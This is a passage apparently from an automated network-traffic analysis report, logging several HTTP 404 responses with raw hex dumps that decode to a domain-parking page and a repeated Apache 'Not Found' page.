a0 2e a7 4a 74 ef 29 d6 3b ce e6 c2 a6 86 e7 47 24 52 a4 ae 60 a0 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 8f f7 e2 dd e4 83 e4 06 9e 77 f1 b7 17 6f c7 77 e8 f5 f6 92 d7 0e 87 2b 75 78 a1 f6 d7 b6 41 a8 cd b0 da 8b a2 61 78 d6 b2 e0 74 26 dc 56 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 03 fc 00 68 51 01 f0 2c 83 2e 39 73 ab 0d 6f ef 43 98 bf d1 e8 66 f2 7e 72 b3 6e c9 66 dd c2 3c 9a f5 99 c9 74 55 ab 95 7a b8 b1 15 c8 e1 10 9d a6 0a 9e 2d 6f b1 2f b6 e0 0b a0 83 85 95 d8 2c 3d 3f 8c 40 1e 46 18 c9 c8 b1 61 80 99 51 a7 74 6d a4 e3 93 9d 96 27 da 98 b1 88 c1 d4 50 9a e1 8b de 72 b3 3e 5c dc a6 a3 34 7a e1 a2 cf 6e a3 7a 3b 68 c6 bb da 4c f1 13 b2 5f fc 84 6d fa 60 9f 15 a7 54 3d 5c 34 dd f6 28 8a 7c 2f cc f4 8c f9 16 8c af 5f 42 4a fd 00 e5 bb 7e d0 62 eb 2a cf 26 88 a5 2f 42 e7 3d d5 82 dd 07 d2 65 23 a4 ba cc db e7 7a 4b eb b3 41 c0 c1 85 2e 86 b2 d3 81 79 5a 2e 21 66 16 71 44 c8 1a 75 d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 60 28 f2 f5 92 1c 0c 57 50 b7 15 fa a3 c0 56 8d 6c 68 62 e2 52 f3 37 d4 9a 90 27 8a f3 24 47 29 ca cd 54 5d f0 bf 83 e7 d1 f1 07 d2 c9 09 3d 73 92 82 c8 ba 82 e5 a9 2d 6b 75 14 0d 32 c9 a6 a4 a6 72 8a 25 a3 41 26 f1 12 15 d9 98 8d 74 ba 5e 23 84 62 bc 4e 0b 7d 1c 3c c1 f8 1f 00 c2 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f f3 ff a3 05 97 0b 87 d2 9b 83 d1 61 e0 0f 7c 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 2b 5c f4 65 47 34 04 64 b6 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 da 49 da 99 f0 3d 17 d5 1b a5 f9 dd 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 be 0a 02 3f 38 64 83 9a 58 46 9b 30 b0 1b a5 62 47 b0 46 66 dd 51 b4 c1 d6 7d 66 b9 08 2a 30 18 69 24 3c b4 6c b3 8d 8a f2 cd bc 3b 48 46 4b e3 b4 ed 77 c6 19 a2 db c6 10 b6 12 fa ab 45 e6 6b a5 28 e5 32 c6 eb e4 a9 d5 ee b6 5c a7 db 8b 80 07 ea 4b 05 c5 7e b8 72 ab 95 be a0 2e a7 4a 74 ef 29 d6 3b ce e6 c2 a6 86 e7 47 24 52 a4 ae 60 a0 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 8f f7 e2 dd e4 83 e4 06 9e 77 f1 b7 17 6f c7 77 e8 f5 f6 92 d7 0e 87 2b 75 78 a1 f6 d7 b6 41 a8 cd b0 da 8b a2 61 78 d6 b2 e0 74 26 dc 56 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 03 fc 00 68 51 01 f0 2c 83 2e 39 73 ab 0d 6f ef 43 98 bf d1 e8 66 f2 7e 72 b3 6e c9 66 dd c2 3c 9a f5 99 c9 74 55 ab 95 7a b8 b1 15 c8 e1 10 9d a6 0a 9e 2d 6f b1 2f b6 e0 0b a0 83 85 95 d8 2c 3d 3f 8c 40 1e 46 18 c9 c8 b1 61 80 99 51 a7 74 6d a4 e3 93 9d 96 27 da 98 b1 88 c1 d4 50 9a e1 8b de 72 b3 3e 5c dc a6 a3 34 7a e1 a2 cf 6e a3 7a 3b 68 c6 bb da 4c f1 13 b2 5f fc 84 6d fa 60 9f 15 a7 54 3d 5c 34 dd f6 28 8a 7c 2f cc f4 8c f9 16 8c af 5f 42 4a fd 00 e5 bb 7e d0 62 eb 2a cf 26 88 a5 2f 42 e7 3d d5 82 dd 07 d2 65 23 a4 ba cc db e7 7a 4b eb b3 41 c0 c1 85 2e 86 b2 d3 81 79 5a 2e 21 66 16 71 44 c8 1a 75 d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 60 28 f2 f5 92 1c 0c 57 50 b7 15 fa a3 c0 56 8d 6c 68 62 e2 52 f3 37 d4 9a 90 27 8a f3 24 47 29 ca cd 54 5d f0 bf 83 e7 d1 f1 07 d2 c9 09 3d 73 92 82 c8 ba 82 e5 a9 2d 6b 75 14 0d 32 c9 a6 a4 a6 72 8a 25 a3 41 26 f1 12 15 d9 98 8d 74 ba 5e 23 84 62 bc 4e 0b 7d 1c 3c c1 f8 1f 00 c2 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f f3 ff a3 05 97 0b 87 d2 9b 83 d1 61 e0 0f 7c 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 31 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:03 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:09 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 